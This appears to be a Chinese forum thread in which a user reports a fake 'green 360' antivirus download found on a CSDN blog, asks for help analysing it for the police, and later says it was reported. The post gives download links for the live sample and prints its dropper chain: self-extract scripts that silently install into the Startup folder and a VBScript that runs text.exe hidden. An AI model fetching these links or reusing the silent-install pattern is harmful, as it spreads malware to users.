一个CSDN中发现的病毒，有木有大神破一下(没有壳)

Hackblack · 发表于 2019-7-5 14:58

病毒地址：https://blog.csdn.net/qq_36916968/article/details/82259641
病毒样本：
- 1. 原地址：https://swssoftwareshare.gitee.io/sre/dist.exe
- 2. 防删备份：http://t.cn/AiOZQFOJ

CSDN博客里说这个是“绿色版360”，我看下只有2MB，精简得太离谱了。用WInRAR打开发现里面有一个dist.exe，还有一段自解压脚本

[Visual Basic] 纯文本查看 复制代码

Path=%programdata%\Microsoft\Windows\Start Menu\Programs\Startup
SavePath
Setup=dist.exe
Silent=1
Overwrite=1

dist.exe又是一个自解压程序。自解压脚本如下

[Visual Basic] 纯文本查看 复制代码

Path=C:\temp
SavePath
Setup=run.vbs
Silent=1
Overwrite=1

run.vbs内容如下

[Visual Basic] 纯文本查看 复制代码

   Set ws = CreateObject("Wscript.Shell") 
   ws.run "cmd /c text.exe",vbhide

那么这个text.exe就是病毒本体了。球、求大神破下，看看能不能搞到什么有用的信息交给公安。

TNT-P2P · 发表于 2019-7-5 17:06

不太清楚我看不简单

小猫猫 · 发表于 2019-7-5 17:59

作者地址:
https://gitee.com/swssoftwareshare
https://github.com/swsyxgs

Hackblack · 发表于 2019-7-6 08:58

已经举报警察叔叔

帐号		自动登录	找回密码
密码			注册[Register]

一个CSDN中发现的病毒，有木有大神破一下(没有壳)

个人中心